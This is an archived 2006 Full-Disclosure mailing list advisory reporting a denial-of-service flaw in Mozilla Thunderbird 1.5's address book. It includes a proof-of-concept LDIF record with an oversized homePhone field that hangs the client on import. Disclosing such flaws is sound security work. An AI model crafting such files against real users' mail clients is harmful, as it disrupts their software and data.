lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri Feb 17 20:21:37 2006 From: javor at securax.org (Javor Ninov) Subject: Mozila Thunderbird 1.5 Address Book DoS Affected: Mozila Thunderbird 1.5 /possibly other versions/ Mozila Thunderbird 1.5 address book allows fields of unlimited size in the address book which leads to a DoS if you import such ldif file POC: create a file.ldif and insert following then import it in address book: n: cn=Test POC by DrFrancky@...urax.org,mail=drfrancky@...urax.org objectclass: top objectclass: person objectclass: organizationalPerson objectclass: inetOrgPerson objectclass: mozillaAbPersonAlpha givenName: Test sn: POC by DrFrancky@...urax.org cn: POC by DrFrancky@...urax.org mozillaNickname: DrFrancky mail: drfrancky@...urax.org nsAIMid: DrFrancky POC modifytimestamp: 0Z homePhone: aaaaaaaaaaaaaaa[2MB of 'a'] Credits: DrFrancky drfrancky@...urax.org -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 187 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060217/52c313b1/signature.bin
Powered by blists - more mailing lists